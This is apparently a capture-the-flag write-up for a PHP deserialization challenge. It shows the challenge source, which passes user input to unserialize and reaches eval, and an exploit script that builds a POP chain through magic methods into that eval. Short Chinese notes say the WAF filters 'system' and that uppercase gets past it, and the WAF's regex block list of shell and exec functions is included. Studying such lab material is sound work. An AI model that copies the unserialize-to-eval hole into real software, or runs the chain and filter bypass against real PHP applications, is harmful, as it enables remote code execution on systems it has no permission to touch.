<?php
include "waf.php";
class NISA{
public $fun="show_me_flag";
public $txw4ever;
public function __wakeup()
{
if($this->fun=="show_me_flag"){
hint();
}
}
function __call($from,$val){
$this->fun=$val[0];
}
public function __toString()
{
echo $this->fun;
return " ";
}
public function __invoke()
{
checkcheck($this->txw4ever);
@eval($this->txw4ever);
}
}
class TianXiWei{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
class Ilovetxw{
public $huang;
public $su;
public function __call($fun1,$arg){
$this->huang->fun=$arg[0];
}
public function __toString(){
$bb = $this->su;
return $bb();
}
}
class four{
public $a="TXW4EVER";
private $fun='abc';
public function __set($name, $value)
{
$this->$name=$value;
if ($this->fun = "sixsixsix"){
strtolower($this->a);
}
}
}
if(isset($_GET['ser'])){
@unserialize($_GET['ser']);
}else{
highlight_file(__FILE__);
}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>exp:
<?php
//__wakeup(NISA)==>__toString(Ilovetxw)==>__invoke==>
class NISA{
public $fun;
public $txw4ever;
}
class Ilovetxw{
public $huang;
public $su;
}
$ser=new NISA();
$ser->fun=new Ilovetxw();
$ser->fun->su=new NISA();
$ser->fun->su->txw4ever='RCE...';
echo urlencode(serialize($ser));
?>pop链的构造其实只需要两个类,另外两个其实可以不用;
主要是最后的checkcheck($data);也不知道到底过滤了什么,还以为是cat ls 等命令,没想到是过滤了system,用大写绕过;
而且flag是fllllllaaag。
waf:
<?php
function checkcheck($data){
if (preg_match("/\`|\^|\||\~|assert|\?|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk/",$data,$match)){
die('something wrong');
}
}
function hint(){
echo "flag is in /";
die();
}